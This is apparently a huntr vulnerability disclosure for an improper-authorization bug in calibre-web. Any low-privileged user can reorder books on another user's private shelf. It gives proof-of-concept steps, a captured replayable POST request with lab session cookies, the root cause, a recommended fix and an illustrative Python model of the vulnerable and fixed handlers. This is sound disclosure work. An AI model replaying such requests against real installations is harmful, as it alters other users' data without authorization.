Improper Authorization in janeczku/calibre-web

huntr report D7498799-4797-4751-B5E2-B669E729D5DB
2022-01-25 08:57:37
nhiephon
www.huntr.dev

EPSS: 0.001 (Low), percentile 21.6%

Description

With default settings, a low-level user has no permission to edit the sort order of books in another user's private shelf. However, because the permission check is performed in the wrong place, the application does not enforce this.

Proof of Concept

  • Step 1: Log in with the admin account and go to http://hostname:8083/admin/user/new. Create a new user “test1” with default permissions (only the “Show *” permissions).
  • Step 2: As admin, create a private shelf and add books to it.
  • Step 3: As test1, obtain the id of admin’s private shelf (brute-force, leaked data, …) and go to http://hostname:8083/shelf/order/:id (in this PoC, http://192.168.150.133:8083/shelf/order/3).
  • Step 4: As test1, click save and capture the request in Burp Suite. Modify the form data and replay the request to edit the sort order of books in shelf 3 (admin’s private shelf).
    Request:
POST /shelf/order/3 HTTP/1.1
Host: 192.168.150.133:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
Origin: http://192.168.150.133:8083
Connection: close
Referer: http://192.168.150.133:8083/shelf/order/3
Cookie: session=.eJwljjtuAzEMBe-iOgV_4oq-zEKkSNgIkAC7dhXk7lkj3bx5zfy0vY487-32PF750fbHaremle4oAOUMmtFjRZ_OtapnRAayJktVokyrraoMttE7oW3ahZaJEfCQoVM3zgVAsiYNjjAuiU18GLuvyezl-D5gQhGJoLYr5HXm8V_D14zzqP35_ZlflwAtGIiKZkXxZpqDJ-lanmEis_fZC9vvH4AIP8o.Ye-55g.y2WeHCTSR6u3ZeXWL6zHGWmQWh4; remember_token=3|a0ad3ac22b2a1c95b6d18388d0186fbcd887a7b02378a4bb2498dc8a32770e173b14bae215b37137207d498cc4a6bdfd8c1b0784ee2f81085bebf3e6d3006edd
Upgrade-Insecure-Requests: 1

1=2&2=1&csrf_token=IjA2ZjA4MTE2MTk5ZjJjZjA4MTJhODNhMjZkZGJlYzk0NGE1NWE1ZjEi.Ye-55g.t3T1U1i3rXOQoAK-1Wi6sUtXm1I

Root-cause

At line 362 (https://github.com/janeczku/calibre-web/blob/master/cps/shelf.py#L362), the server checks the request method (POST) and processes the submitted data immediately, without first checking the user’s permission for the shelf; the permission check only runs later (https://github.com/janeczku/calibre-web/blob/master/cps/shelf.py#L380), after the order has already been written. I recommend moving that user permission check to the top of the order_shelf function.
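The following is an added illustration of the root cause, not code from calibre-web: it models the order_shelf handler with an in-memory shelf store (the User, Shelf, Response classes and the can_edit_shelf, can_view_shelf, parse_order_form, order_shelf_vulnerable and order_shelf_fixed functions are all assumptions made for this example, not the project's own API). The vulnerable variant applies the POST body from the PoC (1=2&2=1&csrf_token=...) before any permission check, so the shelf is reordered even though the user receives a denial; the fixed variant checks the shelf permission first. The edit policy used here (owner or admin may reorder) is assumed for the example.

```python
from dataclasses import dataclass, field
from urllib.parse import parse_qs


# Constructed in-memory stand-ins for calibre-web's user and shelf records
# (assumption: these are not the project's ORM classes).
@dataclass
class User:
    id: int
    name: str
    is_admin: bool = False


@dataclass
class Shelf:
    id: int
    owner_id: int
    is_public: bool = False
    order: dict = field(default_factory=dict)  # book_id -> sort position


@dataclass
class Response:
    status: int
    body: str = ""


def make_state() -> dict:
    """Fresh state: shelf 3 is the private shelf of user 1 (admin), as in the PoC."""
    return {3: Shelf(id=3, owner_id=1, order={1: 1, 2: 2})}


def parse_order_form(body: str) -> dict:
    """Turn the PoC form body '1=2&2=1&csrf_token=...' into {book_id: position}.

    Non-numeric keys (csrf_token) and non-numeric values are ignored.
    """
    to_save = {}
    for key, values in parse_qs(body, keep_blank_values=True).items():
        try:
            to_save[int(key)] = int(values[0])
        except ValueError:
            continue
    return to_save


def can_view_shelf(user: User, shelf: Shelf) -> bool:
    return shelf.is_public or shelf.owner_id == user.id


def can_edit_shelf(user: User, shelf: Shelf) -> bool:
    """Assumed policy for this example: only the owner or an admin may reorder."""
    return shelf.owner_id == user.id or user.is_admin


def _apply_order(shelf: Shelf, to_save: dict) -> None:
    for book_id, position in to_save.items():
        if book_id in shelf.order:
            shelf.order[book_id] = position


def _render(shelf: Shelf) -> str:
    """Book ids in their current sort order, e.g. '2,1'."""
    return ",".join(str(b) for b, _ in sorted(shelf.order.items(), key=lambda kv: kv[1]))


def order_shelf_vulnerable(shelves, user, shelf_id, method, body=""):
    """Same ordering as the report describes: a POST is written first, and the
    permission check only gates the page rendered afterwards."""
    shelf = shelves.get(shelf_id)
    if method == "POST" and shelf is not None:
        _apply_order(shelf, parse_order_form(body))  # BUG: state change before authz
    if shelf is None or not can_view_shelf(user, shelf):
        return Response(403)  # too late: the order has already been changed
    return Response(200, _render(shelf))


def order_shelf_fixed(shelves, user, shelf_id, method, body=""):
    """Permission check first, before any state change."""
    shelf = shelves.get(shelf_id)
    if shelf is None or not can_edit_shelf(user, shelf):
        return Response(403)
    if method == "POST":
        _apply_order(shelf, parse_order_form(body))
    return Response(200, _render(shelf))


if __name__ == "__main__":
    admin, test1 = User(1, "admin", is_admin=True), User(2, "test1")
    body = "1=2&2=1&csrf_token=constructed"  # constructed, mirrors the PoC body
    state = make_state()
    print(order_shelf_vulnerable(state, test1, 3, "POST", body), state[3].order)
    state = make_state()
    print(order_shelf_fixed(state, test1, 3, "POST", body), state[3].order)
```

The point worth checking in a regression test is the state, not the response code: the vulnerable handler answers 403 to test1 yet leaves shelf 3 reordered, which is exactly why a check placed after the write gives no protection.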

Impact

A low-level user can edit the sort order of books in any shelf, including another user’s private shelf.
